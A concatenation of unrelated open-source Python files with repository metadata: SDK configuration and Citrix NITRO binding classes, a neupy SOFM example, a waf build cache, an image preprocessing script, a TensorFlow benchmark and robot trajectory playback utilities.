        :param identifier: The identifier of apiKey.
        :return: The token for api key authentication.
        """
        if self.refresh_api_key_hook:
            self.refresh_api_key_hook(self)

        key = self.api_key.get(identifier)
        if key:
            prefix = self.api_key_prefix.get(identifier)
            if prefix:
                return "%s %s" % (prefix, key)
            else:
                return key

    def get_basic_auth_token(self):
        """Gets HTTP basic authentication header (string).

        :return: The token for basic HTTP authentication.
        """
        return urllib3.util.make_headers(
            basic_auth=self.username + ':' + self.password
        ).get('authorization')

    def auth_settings(self):
        """Gets Auth Settings dict for api client.

        This API declares no auth schemes, so the dict is empty.

        :return: The Auth Settings information dict.
        """
        return {
        }

    def to_debug_report(self):
        """Gets the essential information for debugging.

        :return: The report for debugging.
        """
        return "Python SDK Debug Report:\n"\
               "OS: {env}\n"\
               "Python Version: {pyversion}\n"\
               "Version of the API: v5.0.1\n"\
               "SDK Package Version: 1.0.0".\
               format(env=sys.platform, pyversion=sys.version)
| [
"[email protected]"
] | |
7d5314a98029672f01fe722b58e29b81bd0a8f69 | 9dc5c9dd8bff75a17eb27c75a85f85f1515efbe1 | /examples/competitive/sofm_compare_grid_types.py | 4f33caf37872c3184f5a4581bd45137fb39d3099 | [
"MIT"
] | permissive | BickyMz/neupy | 667a688a3f1f3c9c515376eb2fc32446185230a9 | 3ceb25d3b9f6c00c0b25ef65a25434126006098d | refs/heads/master | 2020-05-24T16:25:03.803826 | 2019-05-05T12:55:46 | 2019-05-05T12:55:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,443 | py | import matplotlib.pyplot as plt
from neupy import algorithms, utils
from helpers import plot_2d_grid, make_circle
plt.style.use('ggplot')
utils.reproducible()


if __name__ == '__main__':
    # Dimensions of the SOFM feature map.
    GRID_WIDTH = 10
    GRID_HEIGHT = 10

    # One SOFM is trained per configuration so the two grid layouts can be
    # compared side by side on the same data.
    configurations = [{
        'grid_type': 'hexagon',
        'use_hexagon_grid': True,
        'title': 'Using hexagon grid',
    }, {
        'grid_type': 'rect',
        'use_hexagon_grid': False,
        # Fixed typo in the plot title (was 'regcangular').
        'title': 'Using rectangular grid',
    }]

    data = make_circle()
    red, blue = ('#E24A33', '#348ABD')

    n_columns = len(configurations)
    plt.figure(figsize=(12, 5))

    for index, conf in enumerate(configurations, start=1):
        sofm = algorithms.SOFM(
            n_inputs=2,
            features_grid=(GRID_HEIGHT, GRID_WIDTH),
            verbose=True,
            shuffle_data=True,

            grid_type=conf['grid_type'],

            learning_radius=8,
            reduce_radius_after=5,

            std=2,
            reduce_std_after=5,

            step=0.3,
            reduce_step_after=5,
        )
        sofm.train(data, epochs=40)

        plt.subplot(1, n_columns, index)
        plt.title(conf['title'])
        # Input samples in blue, learned SOFM weights in red.
        plt.scatter(*data.T, color=blue, alpha=0.05)
        plt.scatter(*sofm.weight, color=red)

        weights = sofm.weight.reshape((2, GRID_HEIGHT, GRID_WIDTH))
        plot_2d_grid(weights, color=red, hexagon=conf['use_hexagon_grid'])

    plt.show()
| [
"[email protected]"
] | |
0e28eda07956ac5acd87b7c0d705815ef5658849 | aa1972e6978d5f983c48578bdf3b51e311cb4396 | /nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/cs/csvserver_feopolicy_binding.py | acb178fbe6eab499c4161045696cebc885acad74 | [
"Python-2.0",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | MayankTahil/nitro-ide | 3d7ddfd13ff6510d6709bdeaef37c187b9f22f38 | 50054929214a35a7bb19ed10c4905fffa37c3451 | refs/heads/master | 2020-12-03T02:27:03.672953 | 2017-07-05T18:09:09 | 2017-07-05T18:09:09 | 95,933,896 | 2 | 5 | null | 2017-07-05T16:51:29 | 2017-07-01T01:03:20 | HTML | UTF-8 | Python | false | false | 11,337 | py | #
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class csvserver_feopolicy_binding(base_resource) :
    """ Binding class showing the feopolicy that can be bound to csvserver.

    NOTE: this class follows the auto-generated NITRO SDK pattern
    (private attributes exposed through property getter/setter pairs,
    plus classmethod CRUD helpers); keep edits consistent with the
    other generated binding classes.
    """
    def __init__(self) :
        self._policyname = None
        self._priority = None
        self._gotopriorityexpression = None
        self._bindpoint = None
        self._name = None
        self._targetlbvserver = None
        self._invoke = None
        self._labeltype = None
        self._labelname = None
        # Count of resources returned by a count() request.
        self.___count = 0

    @property
    def priority(self) :
        r"""Priority for the policy.
        """
        try :
            return self._priority
        except Exception as e:
            raise e

    @priority.setter
    def priority(self, priority) :
        r"""Priority for the policy.
        """
        try :
            self._priority = priority
        except Exception as e:
            raise e

    @property
    def bindpoint(self) :
        r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE.
        """
        try :
            return self._bindpoint
        except Exception as e:
            raise e

    @bindpoint.setter
    def bindpoint(self, bindpoint) :
        r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE
        """
        try :
            self._bindpoint = bindpoint
        except Exception as e:
            raise e

    @property
    def policyname(self) :
        r"""Policies bound to this vserver.
        """
        try :
            return self._policyname
        except Exception as e:
            raise e

    @policyname.setter
    def policyname(self, policyname) :
        r"""Policies bound to this vserver.
        """
        try :
            self._policyname = policyname
        except Exception as e:
            raise e

    @property
    def labelname(self) :
        r"""Name of the label to be invoked.
        """
        try :
            return self._labelname
        except Exception as e:
            raise e

    @labelname.setter
    def labelname(self, labelname) :
        r"""Name of the label to be invoked.
        """
        try :
            self._labelname = labelname
        except Exception as e:
            raise e

    @property
    def name(self) :
        r"""Name of the content switching virtual server to which the content switching policy applies.<br/>Minimum length = 1.
        """
        try :
            return self._name
        except Exception as e:
            raise e

    @name.setter
    def name(self, name) :
        r"""Name of the content switching virtual server to which the content switching policy applies.<br/>Minimum length = 1
        """
        try :
            self._name = name
        except Exception as e:
            raise e

    @property
    def targetlbvserver(self) :
        r"""Name of the Load Balancing virtual server to which the content is switched, if policy rule is evaluated to be TRUE.
        Example: bind cs vs cs1 -policyname pol1 -priority 101 -targetLBVserver lb1
        Note: Use this parameter only in case of Content Switching policy bind operations to a CS vserver.
        """
        try :
            return self._targetlbvserver
        except Exception as e:
            raise e

    @targetlbvserver.setter
    def targetlbvserver(self, targetlbvserver) :
        r"""Name of the Load Balancing virtual server to which the content is switched, if policy rule is evaluated to be TRUE.
        Example: bind cs vs cs1 -policyname pol1 -priority 101 -targetLBVserver lb1
        Note: Use this parameter only in case of Content Switching policy bind operations to a CS vserver
        """
        try :
            self._targetlbvserver = targetlbvserver
        except Exception as e:
            raise e

    @property
    def gotopriorityexpression(self) :
        r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
        """
        try :
            return self._gotopriorityexpression
        except Exception as e:
            raise e

    @gotopriorityexpression.setter
    def gotopriorityexpression(self, gotopriorityexpression) :
        r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
        """
        try :
            self._gotopriorityexpression = gotopriorityexpression
        except Exception as e:
            raise e

    @property
    def invoke(self) :
        r"""Invoke a policy label if this policy's rule evaluates to TRUE (valid only for default-syntax policies such as application firewall, transform, integrated cache, rewrite, responder, and content switching).
        """
        try :
            return self._invoke
        except Exception as e:
            raise e

    @invoke.setter
    def invoke(self, invoke) :
        r"""Invoke a policy label if this policy's rule evaluates to TRUE (valid only for default-syntax policies such as application firewall, transform, integrated cache, rewrite, responder, and content switching).
        """
        try :
            self._invoke = invoke
        except Exception as e:
            raise e

    @property
    def labeltype(self) :
        r"""Type of label to be invoked.
        """
        try :
            return self._labeltype
        except Exception as e:
            raise e

    @labeltype.setter
    def labeltype(self, labeltype) :
        r"""Type of label to be invoked.
        """
        try :
            self._labeltype = labeltype
        except Exception as e:
            raise e

    def _get_nitro_response(self, service, response) :
        r""" converts nitro response into object and returns the object array in case of get request.
        """
        try :
            result = service.payload_formatter.string_to_resource(csvserver_feopolicy_binding_response, response, self.__class__.__name__)
            if(result.errorcode != 0) :
                # Error code 444 means the session is no longer valid.
                if (result.errorcode == 444) :
                    service.clear_session(self)
                if result.severity :
                    if (result.severity == "ERROR") :
                        raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
                else :
                    raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
            return result.csvserver_feopolicy_binding
        except Exception as e :
            raise e

    def _get_object_name(self) :
        r""" Returns the value of object identifier argument
        """
        try :
            if self.name is not None :
                return str(self.name)
            return None
        except Exception as e :
            raise e

    @classmethod
    def add(cls, client, resource) :
        r""" Use this API to bind one feopolicy (or a list of them) to a csvserver.
        """
        try :
            if resource and type(resource) is not list :
                updateresource = csvserver_feopolicy_binding()
                updateresource.name = resource.name
                updateresource.policyname = resource.policyname
                updateresource.targetlbvserver = resource.targetlbvserver
                updateresource.priority = resource.priority
                updateresource.gotopriorityexpression = resource.gotopriorityexpression
                updateresource.bindpoint = resource.bindpoint
                updateresource.invoke = resource.invoke
                updateresource.labeltype = resource.labeltype
                updateresource.labelname = resource.labelname
                return updateresource.update_resource(client)
            else :
                # A list of resources is sent as one bulk request.
                if resource and len(resource) > 0 :
                    updateresources = [csvserver_feopolicy_binding() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        updateresources[i].name = resource[i].name
                        updateresources[i].policyname = resource[i].policyname
                        updateresources[i].targetlbvserver = resource[i].targetlbvserver
                        updateresources[i].priority = resource[i].priority
                        updateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression
                        updateresources[i].bindpoint = resource[i].bindpoint
                        updateresources[i].invoke = resource[i].invoke
                        updateresources[i].labeltype = resource[i].labeltype
                        updateresources[i].labelname = resource[i].labelname
                return cls.update_bulk_request(client, updateresources)
        except Exception as e :
            raise e

    @classmethod
    def delete(cls, client, resource) :
        r""" Use this API to unbind one feopolicy (or a list of them) from a csvserver.
        """
        try :
            if resource and type(resource) is not list :
                deleteresource = csvserver_feopolicy_binding()
                deleteresource.name = resource.name
                deleteresource.policyname = resource.policyname
                deleteresource.bindpoint = resource.bindpoint
                deleteresource.priority = resource.priority
                return deleteresource.delete_resource(client)
            else :
                if resource and len(resource) > 0 :
                    deleteresources = [csvserver_feopolicy_binding() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        deleteresources[i].name = resource[i].name
                        deleteresources[i].policyname = resource[i].policyname
                        deleteresources[i].bindpoint = resource[i].bindpoint
                        deleteresources[i].priority = resource[i].priority
                return cls.delete_bulk_request(client, deleteresources)
        except Exception as e :
            raise e

    @classmethod
    def get(cls, service, name="", option_="") :
        r""" Use this API to fetch csvserver_feopolicy_binding resources.
        """
        try :
            if not name :
                obj = csvserver_feopolicy_binding()
                response = obj.get_resources(service, option_)
            else :
                obj = csvserver_feopolicy_binding()
                obj.name = name
                response = obj.get_resources(service)
            return response
        except Exception as e:
            raise e

    @classmethod
    def get_filtered(cls, service, name, filter_) :
        r""" Use this API to fetch filtered set of csvserver_feopolicy_binding resources.
        Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
        """
        try :
            obj = csvserver_feopolicy_binding()
            obj.name = name
            option_ = options()
            option_.filter = filter_
            response = obj.getfiltered(service, option_)
            return response
        except Exception as e:
            raise e

    @classmethod
    def count(cls, service, name) :
        r""" Use this API to count csvserver_feopolicy_binding resources configued on NetScaler.
        """
        try :
            obj = csvserver_feopolicy_binding()
            obj.name = name
            option_ = options()
            option_.count = True
            response = obj.get_resources(service, option_)
            if response :
                return response[0].__dict__['___count']
            return 0
        except Exception as e:
            raise e

    @classmethod
    def count_filtered(cls, service, name, filter_) :
        r""" Use this API to count the filtered set of csvserver_feopolicy_binding resources.
        Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
        """
        try :
            obj = csvserver_feopolicy_binding()
            obj.name = name
            option_ = options()
            option_.count = True
            option_.filter = filter_
            response = obj.getfiltered(service, option_)
            if response :
                return response[0].__dict__['___count']
            return 0
        except Exception as e:
            raise e

    class Bindpoint:
        # Allowed values for the bindpoint attribute.
        REQUEST = "REQUEST"
        RESPONSE = "RESPONSE"

    class Labeltype:
        # Allowed values for the labeltype attribute.
        reqvserver = "reqvserver"
        resvserver = "resvserver"
        policylabel = "policylabel"
policylabel = "policylabel"
class csvserver_feopolicy_binding_response(base_response) :
    """Container for the NITRO API response that wraps a list of
    csvserver_feopolicy_binding resources plus the standard NITRO
    status fields (errorcode/message/severity/sessionid)."""

    def __init__(self, length=1) :
        # Removed a redundant initial assignment: the binding list was
        # first set to [] and then immediately overwritten below.
        self.errorcode = 0
        self.message = ""
        self.severity = ""
        self.sessionid = ""
        self.csvserver_feopolicy_binding = [csvserver_feopolicy_binding() for _ in range(length)]
| [
"[email protected]"
] | |
277892508b145e197f2e8e451e059b45ae7d1432 | 0b64e696083d567ed18e6366d8bd8e99733e1485 | /node_modules/socket.io/node_modules/redis/node_modules/hiredis/build/c4che/Release.cache.py | 760ac556fb84b9aa1a219e95c3e78caf69dbbc15 | [
"MIT"
] | permissive | iambibhas/myn3 | 340286d56edcde4ad024b63f0b12e1ecb7c6b15f | 994c2850ac76920289004dc67f46bcedf7e652dc | refs/heads/master | 2021-01-01T05:53:35.376823 | 2012-09-24T20:20:16 | 2012-09-24T20:20:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | AR = '/usr/bin/ar'
ARFLAGS = 'rcs'
CCFLAGS = ['-g']
CCFLAGS_MACBUNDLE = ['-fPIC']
CCFLAGS_NODE = ['-D_LARGEFILE_SOURCE', '-D_FILE_OFFSET_BITS=64']
CC_VERSION = ('4', '6', '3')
COMPILER_CXX = 'g++'
CPP = '/usr/bin/cpp'
CPPFLAGS_NODE = ['-D_GNU_SOURCE']
CPPPATH_NODE = '/usr/include/nodejs'
CPPPATH_ST = '-I%s'
CXX = ['/usr/bin/g++']
CXXDEFINES_ST = '-D%s'
CXXFLAGS = ['-g', '-Wall', '-O3']
CXXFLAGS_DEBUG = ['-g']
CXXFLAGS_NODE = ['-D_LARGEFILE_SOURCE', '-D_FILE_OFFSET_BITS=64']
CXXFLAGS_RELEASE = ['-O2']
CXXLNK_SRC_F = ''
CXXLNK_TGT_F = ['-o', '']
CXX_NAME = 'gcc'
CXX_SRC_F = ''
CXX_TGT_F = ['-c', '-o', '']
DEST_BINFMT = 'elf'
DEST_CPU = 'x86_64'
DEST_OS = 'linux'
FULLSTATIC_MARKER = '-static'
LIBDIR = '/home/bibhas/.node_libraries'
LIBPATH_HIREDIS = '../deps/hiredis'
LIBPATH_NODE = '/usr/lib'
LIBPATH_ST = '-L%s'
LIB_HIREDIS = 'hiredis'
LIB_ST = '-l%s'
LINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']
LINK_CXX = ['/usr/bin/g++']
NODE_PATH = '/home/bibhas/.node_libraries'
PREFIX = '/usr/local'
PREFIX_NODE = '/usr'
RANLIB = '/usr/bin/ranlib'
RPATH_ST = '-Wl,-rpath,%s'
SHLIB_MARKER = '-Wl,-Bdynamic'
SONAME_ST = '-Wl,-h,%s'
STATICLIBPATH_ST = '-L%s'
STATICLIB_MARKER = '-Wl,-Bstatic'
STATICLIB_ST = '-l%s'
macbundle_PATTERN = '%s.bundle'
program_PATTERN = '%s'
shlib_CXXFLAGS = ['-fPIC', '-DPIC']
shlib_LINKFLAGS = ['-shared']
shlib_PATTERN = 'lib%s.so'
staticlib_LINKFLAGS = ['-Wl,-Bstatic']
staticlib_PATTERN = 'lib%s.a'
| [
"[email protected]"
] | |
47c4dfc1e15fb0f15d11f9e64213a4ad1ec7b299 | f4f19a0b856ba36100f67272b05dad90c76b7457 | /pre_processing/pre_process.py | d798aafcbd20c54aaac01bdeef281b7092d8d104 | [] | no_license | JamesBrace/kaggle | b9d8130aa1b5d17a2d89f3fa64b1142eb7167f7e | 2069a5a3afa236bf57b25526439b5d5950e4b136 | refs/heads/master | 2021-04-26T22:28:18.676810 | 2018-03-06T18:25:43 | 2018-03-06T18:25:43 | 124,097,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,993 | py | import numpy as np
from skimage.feature import canny
from scipy import ndimage as ndi
import matplotlib.pyplot as plt
from skimage import morphology
from skimage import util
class PreProcessedData:
    """Load the 64x64 digit images and run an edge-based segmentation
    pipeline: invert -> canny edges -> fill holes -> remove small objects.

    NOTE(review): the intermediate example plots (plt.show()) block
    execution until closed; consider gating them behind a flag.
    """

    def __init__(self):
        self.x = []                  # raw images, reshaped to (-1, 64, 64)
        self.y = []                  # labels, reshaped to (-1, 1)
        self.cannied_images = []     # per-image boolean edge maps
        self.filled_images = []      # edge maps with interior holes filled
        self.cleaned_images = []     # filled maps with small specks removed
        self.processed_images = []

        print("Getting and reshaping data")
        self.get_and_reshape_data()

        print("Pre-processing data")
        self.pre_process()

    def get_and_reshape_data(self):
        """Load the training images/labels from CSV and reshape them."""
        self.x = np.loadtxt("../data/train_x.csv", delimiter=",")  # load from text
        self.y = np.loadtxt("../data/train_y.csv", delimiter=",")
        self.x = self.x.reshape(-1, 64, 64)  # reshape
        self.y = self.y.reshape(-1, 1)

        plt.imshow(self.x[0], cmap='gray')
        plt.show()

    def pre_process(self):
        """Run the three pipeline stages in order."""
        print("Canny-ing images")
        self.canny_images()
        print("Filling images")
        self.fill_images()
        print("Cleaning images")
        self.clean_images()

    def canny_images(self):
        """Invert every image and compute its Canny edge map."""
        print(self.x[0])

        print("Inverting images")
        inverted_images = list(map(util.invert, self.x))

        plt.imshow(inverted_images[0], cmap='gray')
        plt.show()

        print("Cannying inverted images")
        self.cannied_images = list(map(canny, inverted_images))

        # Done for test purposes
        self.display_canny_image_example()

    def display_canny_image_example(self):
        plt.imshow(self.cannied_images[0], cmap='gray')
        plt.show()

        fig, ax = plt.subplots(figsize=(64, 64))
        ax.imshow(self.cannied_images[0], cmap=plt.cm.gray, interpolation='nearest')
        ax.set_title('Canny detector')
        ax.axis('off')
        ax.set_adjustable('box-forced')
        plt.show()

    def fill_images(self):
        """Fill the interior holes of every edge map."""
        self.filled_images = list(map(ndi.binary_fill_holes, self.cannied_images))
        self.cannied_images = []  # free the intermediate stage

        # Done for test purposes
        self.display_filled_image_example()

    def display_filled_image_example(self):
        plt.imshow(self.filled_images[0], cmap='gray')
        plt.show()

        fig, ax = plt.subplots(figsize=(64, 64))
        ax.imshow(self.filled_images[0], cmap=plt.cm.gray, interpolation='nearest')
        ax.set_title('filling the holes')
        ax.axis('off')
        plt.show()

    def clean_images(self):
        """Remove connected components smaller than 21 pixels."""
        # BUG FIX: morphology.remove_small_objects expects a single boolean
        # (or labelled) ndarray, but the original passed the whole Python
        # list of images, which fails at runtime.  Apply it per image.
        self.cleaned_images = [
            morphology.remove_small_objects(image, 21)
            for image in self.filled_images
        ]
        self.filled_images = []  # free the intermediate stage

        self.display_clean_image_example()

    def display_clean_image_example(self):
        plt.imshow(self.cleaned_images[0], cmap='gray')
        plt.show()

        fig, ax = plt.subplots(figsize=(64, 64))
        ax.imshow(self.cleaned_images[0], cmap=plt.cm.gray, interpolation='nearest')
        ax.set_title('filling the holes')
        ax.axis('off')
        plt.show()
| [
"[email protected]"
] | |
09360acd5784b7d43b7da742def5c650aacf37dc | 38a972a3cd1fc303b5f877e24d65118912d85d1c | /path/to/virtualenv/project/Lib/site-packages/tensorflow/python/ops/accumulate_n_benchmark.py | 9fb5b537c24e331fe9de5436d162df1024bcb89b | [] | no_license | ZulfikarAkbar/YOLO_ObjectDetection | 0c1015aa987d03329eae48a2053a07dda05d96c0 | 3517d0592a269f79df9afd82e0b1b0123bbe0473 | refs/heads/master | 2022-10-27T05:08:26.734173 | 2019-02-07T17:35:22 | 2019-02-07T17:35:22 | 169,613,306 | 0 | 1 | null | 2022-10-18T02:18:17 | 2019-02-07T17:35:03 | Python | UTF-8 | Python | false | false | 5,606 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmark for accumulate_n() in math_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import test
class AccumulateNBenchmark(test.Benchmark):
def _AccumulateNTemplate(self, inputs, init, shape, validate_shape):
var = gen_state_ops.temporary_variable(
shape=shape, dtype=inputs[0].dtype.base_dtype)
ref = state_ops.assign(var, init, validate_shape=validate_shape)
update_ops = [
state_ops.assign_add(
ref, tensor, use_locking=True).op for tensor in inputs
]
with ops.control_dependencies(update_ops):
return gen_state_ops.destroy_temporary_variable(ref, var_name=var.op.name)
def _AccumulateNInitializedWithFirst(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros_like(inputs[0]),
shape=inputs[0].get_shape(),
validate_shape=True)
def _AccumulateNInitializedWithMerge(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros_like(gen_control_flow_ops.merge(inputs)[0]),
shape=tensor_shape.vector(0),
validate_shape=False)
def _AccumulateNInitializedWithShape(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros(
shape=inputs[0].get_shape(), dtype=inputs[0].dtype.base_dtype),
shape=inputs[0].get_shape(),
validate_shape=True)
def _GenerateUnorderedInputs(self, size, n):
inputs = [random_ops.random_uniform(shape=[size]) for _ in xrange(n)]
random.shuffle(inputs)
return inputs
def _GenerateReplicatedInputs(self, size, n):
return n * self._GenerateUnorderedInputs(size, 1)
def _GenerateOrderedInputs(self, size, n):
inputs = self._GenerateUnorderedInputs(size, 1)
queue = data_flow_ops.FIFOQueue(
capacity=1, dtypes=[inputs[0].dtype], shapes=[inputs[0].get_shape()])
for _ in xrange(n - 1):
op = queue.enqueue(inputs[-1])
with ops.control_dependencies([op]):
inputs.append(math_ops.tanh(1.0 + queue.dequeue()))
return inputs
def _GenerateReversedInputs(self, size, n):
inputs = self._GenerateOrderedInputs(size, n)
inputs.reverse()
return inputs
def _SetupAndRunBenchmark(self, graph, inputs, repeats, format_args):
with graph.as_default():
add_n = math_ops.add_n(inputs)
acc_n_first = self._AccumulateNInitializedWithFirst(inputs)
acc_n_merge = self._AccumulateNInitializedWithMerge(inputs)
acc_n_shape = self._AccumulateNInitializedWithShape(inputs)
test_ops = (("AddN", add_n.op),
("AccNFirst", acc_n_first.op),
("AccNMerge", acc_n_merge.op),
("AccNShape", acc_n_shape.op))
with session.Session(graph=graph):
for tag, op in test_ops:
for _ in xrange(100):
op.run() # Run for warm up.
start = time.time()
for _ in xrange(repeats):
op.run()
duration = time.time() - start
args = format_args + (tag, duration)
print(self._template.format(*args))
def _RunBenchmark(self, tag, input_fn, sizes, ninputs, repeats):
for size in sizes:
for ninput in ninputs:
graph = ops.Graph()
with graph.as_default():
inputs = input_fn(size, ninput)
format_args = (tag, size, ninput, repeats)
self._SetupAndRunBenchmark(graph, inputs, repeats, format_args)
  def benchmarkAccumulateN(self):
    # Six fixed-width left-aligned columns per printed row.
    self._template = "{:<15}" * 6
    args = {
        "sizes": (128, 128**2),
        "ninputs": (1, 10, 100, 300),
        "repeats": 100
    }
    # Four input-ordering strategies, each exercising a different data
    # availability pattern for the accumulate_n variants.
    benchmarks = (("Replicated", self._GenerateReplicatedInputs),
                  ("Unordered", self._GenerateUnorderedInputs),
                  ("Ordered", self._GenerateOrderedInputs),
                  ("Reversed", self._GenerateReversedInputs))
    print(self._template.format("", "Size", "#Inputs", "#Repeat", "Method",
                                "Duration"))
    print("-" * 90)
    for benchmark in benchmarks:
      self._RunBenchmark(*benchmark, **args)
# Running this file directly hands control to the TensorFlow test/benchmark
# runner, which discovers and executes the benchmark methods above.
if __name__ == "__main__":
  test.main()
| [
"[email protected]"
] | |
d68d032e544410088da51547b06a4ca3e587f2b2 | f78e7917536b5ce8630fcab47428254fe6814591 | /RIK_simulator/src/lbd_playback/bin/playbackUtils.py | 12677392f8e812bce5f673014702e0941273b105 | [] | no_license | xuezhizeng/hwang_robot_works | da507993dbfb278e6981304d988d44e263a8b981 | 211f6aede9e5929ca4d174e8d1c28b3b3082752c | refs/heads/master | 2020-03-07T14:31:44.041890 | 2017-09-05T15:25:23 | 2017-09-05T15:25:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,276 | py | import numpy as np
import IK.transformations as T
from usingRosBag_linear import *
from IK.tongsCenter import *
class PlaybackUtils:
    """Helpers for replaying recorded tongs/Vive-tracker trajectories.

    Converts recorded samples (Vive position/orientation plus tongs encoder
    angle) looked up from a bag parser into robot-frame targets and a
    gripper opening command.
    """
    def __init__(self, vars):
        # Global variables
        # Fixed offset subtracted from recorded positions to shift them into
        # the robot's frame (see transformPosition).
        self.positionDisplacement = np.array([0,0,-0.22])
        # Shared state object; getGripperValue reads eeGoalPos / eeGoalOr /
        # encoderValue from it.
        self.vars = vars
        # self.positionDisplacement = np.array([0,0,-0.38])
        # Physical dimensions (meters) of the tongs and gripper hardware.
        self.tongsLength = 0.2286
        self.gripperLength = 0.1524
    def getNextDataColumn(self, time, parser, tongsTransform):
        '''
        Look up the recorded sample whose timestamp is closest to `time`.

        :param time: the desired time to be found (in seconds)
        :param parser: the bag parser that contains the data table
        :param tongsTransform: tongs transform object used to compute the
            tongs-center position from pose and encoder angle
        :return: (time, pos, quat, encoder) of the closest sample, where
            `pos` is the transformed tongs-center position and `time` is the
            actual sample timestamp (may differ from the requested time)
        '''
        timeIdx = self.find_closest(parser.timeStampArray, time)
        # Rebind `time` to the timestamp of the sample actually selected.
        time = parser.resample_time_stamp[timeIdx]
        pos = parser.vivePos_interpolated[timeIdx]
        pos = self.transformPosition(pos)
        quat = parser.viveQuat_interpolated[timeIdx]
        encoder = parser.encoderarray_interpolated[timeIdx]
        pos = tongsTransform.getCenterPosition(pos,quat,encoder)
        return time, pos, quat, encoder
    def find_closest(self,A, target):
        #A must be sorted
        # Binary-search for the insertion point, then step back one index when
        # the left neighbor is closer to `target` than the right one.
        # (Boolean subtraction: True == 1, False == 0.)
        idx = A.searchsorted(target)
        idx = np.clip(idx, 1, len(A)-1)
        left = A[idx-1]
        right = A[idx]
        idx -= target - left < right - target
        return idx
    def checkValidConfig(self,pos, quat):
        '''
        checks if the given position and orientation are reachable by the ur5 robot arm
        (currently a stub that accepts every configuration)
        :param pos:
        :param quat:
        :return: always True for now
        '''
        # stub
        return True
    def transformPosition(self, pos):
        '''
        rotates the position to the VREP and urscript version of global space
        (the rotation is currently disabled; only the fixed displacement is
        applied)
        :param pos: position as a 3-element sequence
        :return: displaced position as a plain Python list
        '''
        # posRet = [pos[1],-pos[0],pos[2]]
        posRet = pos
        posRet = np.array(posRet)
        posRet -= self.positionDisplacement
        return posRet.tolist()
    def transformQuat(self, quat):
        '''
        rotates the quaternion to the VREP and urscript version of global space
        :param quat: quaternion as [w, x, y, z]
        :return: quaternion derived from the (unmodified) input matrix
        '''
        quatMat = T.quaternion_matrix(quat)
        # NOTE(review): retMat is filled with an axis swap below but never
        # used -- the return value round-trips quatMat, so the swap appears
        # disabled. Confirm whether returning retMat was intended.
        retMat = np.zeros((4,4))
        retMat[:,0] = quatMat[:,1]
        retMat[:,1] = -quatMat[:,0]
        retMat[:,2] = quatMat[:,2]
        return T.quaternion_from_matrix(quatMat)
    def getGripperValue(self):
        '''
        returns the gripper value (between 0 and 0.085) that corresponds to
        the encoder value (in radians) currently stored in self.vars
        :return: 0.0 when the encoder reads below 0.035, otherwise the raw
            encoder value
        '''
        # 0 for open, 1 for close
        # NOTE(review): `flag` is a local reset to 0 on every call, so the
        # `elif` branch (flag == 1) can never fire; encoder values >= 0.035
        # are returned unchanged. Looks like hysteresis across calls was
        # intended -- confirm.
        flag = 0
        pos = self.vars.eeGoalPos
        quat = self.vars.eeGoalOr
        encoder = self.vars.encoderValue
        if encoder < 0.035 and flag == 0:
            encoder = 0.0
            flag = 1
        elif encoder >= 0.035 and flag == 1:
            encoder = 0.085
            flag = 0
        return encoder
        # The string literal below is disabled code kept for reference; it is
        # unreachable (it follows the return above).
        '''
        distance = self.vars.TongsTransform.getTongsDistance(pos,quat,encoder)
        if distance < 0.0:
            return 0.0
        #if distance > 0.066675:
        # return 0.085
        u = distance / 0.34
        return u*0.085
        '''
    ################## DEPRECATED FUNCTIONS ##############################################
    # The string literals below hold old, disabled implementations; they are
    # evaluated as class-level string constants and have no runtime effect.
    '''
    # get the next position and orientation in the file
